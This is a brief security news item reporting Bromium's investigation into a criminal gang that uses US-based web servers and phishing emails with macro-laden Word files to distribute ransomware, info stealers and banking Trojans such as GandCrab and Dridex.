Cyber-criminals gang uses US-based Web-servers, hosts and distributes malware

Bromium a virtualization company in its recent investigation found that cyber-criminals were using USA situated Web-servers for hosting as well as distributing ransomware, info stealers and banking Trojans. One particular such gang having probable links with the infamous Necurs network-of-bots' operators is reportedly abusing over twelve USA situated servers seemingly in a network for aiding attackers proliferate various strains of banking Trojans, ransomware along with other malicious programs onto targets based mainly inside the country.

Since almost a year, Bromium is said to be tracking the gang's activities when it has noticed that the gang used the servers for harboring a minimum of 2 ransomware families, 3 info-stealers and 5 banking Trojan families. The malicious programs comprise GandCrab ransomware, Dridex banker Trojan and Neutrino a well-known attack toolkit.

For distribution of the mentioned malware strains, the gang uses phishing e-mails which are markedly similar, suggesting they're coming from the same attackers. A lot of the electronic mails contain Microsoft Word files having malevolent VBA macros, as well as contain web-links leading onto the same US located servers. Each and every macro in the phishing e-mails have one hard-coded Internet Protocol address instead of one domain name related to the Web-servers harboring malware of the second level.

According to Bromium, its investigation indicates the ongoing campaigns are from one well organized operation of 'Amazon-fashion' like fulfillment. An exclusive threat criminal is behind the hosting and e-mail, whilst others handle the malware programs' operations. The entity responsible for regulating the hosting device acts as certain "choke point" during working of the gangs responsible for the respective malware families, the company explains. www.darkreading.com posted this, April 4, 2019.

There have even been multiple instances of using those same servers as the threat group executing its malware assaults either combined 1st and 2nd phase malicious software for an attack or hosted varied attacks every week.

While notifying relevant authorities, Bromium says the USA situated company, which's supporting the malicious servers, along with its affiliates has real clients impressed with the inexpensive rates of web-hosting provided. Moreover, the company has registered nearly 53,000 IPs, a few of which alone hosted malware.

» SPAMfighter News - 4/12/2019